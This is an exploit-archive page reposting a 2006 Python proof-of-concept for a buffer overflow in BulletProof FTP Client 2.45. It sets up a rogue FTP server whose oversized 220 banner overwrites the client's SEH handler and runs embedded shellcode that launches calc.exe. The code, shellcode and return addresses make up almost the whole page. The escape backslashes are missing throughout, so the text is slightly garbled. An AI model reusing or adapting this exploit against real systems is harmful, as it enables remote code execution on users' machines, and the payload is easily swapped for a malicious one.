BulletProof FTP Client 2.45 Remote Buffer Overflow Exploit (PoC)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : BulletProof FTP Client 2.45 Remote Buffer Overflow Exploit (PoC)
# Published : 2006-10-12
# Author : h07
# Previous Title : Ipswitch IMail Server 2006 / 8.x (RCPT) Remote Stack Overflow Exploit
# Next Title : McAfee ePo 3.5.0 / ProtectionPilot 1.1.0 (Source) Remote Exploit

#!/usr/bin/python
# BulletProof FTP (Client) V2.45 0day Buffer Overflow PoC Exploit
# Vendor URL: http://www.bpftp.com/
# Bug discovered by h07 <h07@interia.pl>
# Shellcode type: Windows Execute Command (calc.exe) thx metasploit.com
# Tested on 2000 SP4 Polish
# Details:
#
# buffer = "220 " + ("A" * 4112) + "rn"
# 41414141  Pointer to next SEH record
# 41414141  SE handler
##

from socket import *
from struct import pack
from time import sleep

shellcode = (
"x31xc9x83xe9xdbxd9xeexd9x74x24xf4x5bx81x73x13xd8"
"x22x72xe4x83xebxfcxe2xf4x24xcax34xe4xd8x22xf9xa1"
"xe4xa9x0exe1xa0x23x9dx6fx97x3axf9xbbxf8x23x99x07"
"xf6x6bxf9xd0x53x23x9cxd5x18xbbxdex60x18x56x75x25"
"x12x2fx73x26x33xd6x49xb0xfcx26x07x07x53x7dx56xe5"
"x33x44xf9xe8x93xa9x2dxf8xd9xc9xf9xf8x53x23x99x6d"
"x84x06x76x27xe9xe2x16x6fx98x12xf7x24xa0x2dxf9xa4"
"xd4xa9x02xf8x75xa9x1axecx31x29x72xe4xd8xa9x32xd0"
"xddx5ex72xe4xd8xa9x1axd8x87x13x84x84x8exc9x7fx8c"
"x28xa8x76xbbxb0xbax8cx6exd6x75x8dx03x30xccx8dx1b"
"x27x41x13x88xbbx0cx17x9cxbdx22x72xe4")

host = "0.0.0.0"
port = 21
LEN = 4104
NEXT_SEH_RECORD = 0x909006EB  # JMP SHORT + 0x06
SE_HANDLER = 0x77585A69       # POP POP RET (2000 SP4 Polish) 

s = socket(AF_INET, SOCK_STREAM)
s.bind((host, port))
s.listen(1)
print "n[+] Listening on %d ..." % port

cl, addr = s.accept()
print "[+] Connection accepted from %s" % addr[0]

buffer = "220 "
buffer += "A" * LEN
buffer += pack("<L", NEXT_SEH_RECORD)
buffer += pack("<L", SE_HANDLER)
buffer += shellcode
buffer += "rn"

cl.send(buffer)
print "[+] Sending buffer: OKn"

sleep(1)
cl.close()
s.close()

# EoF

# www.Syue.com [2006-10-12]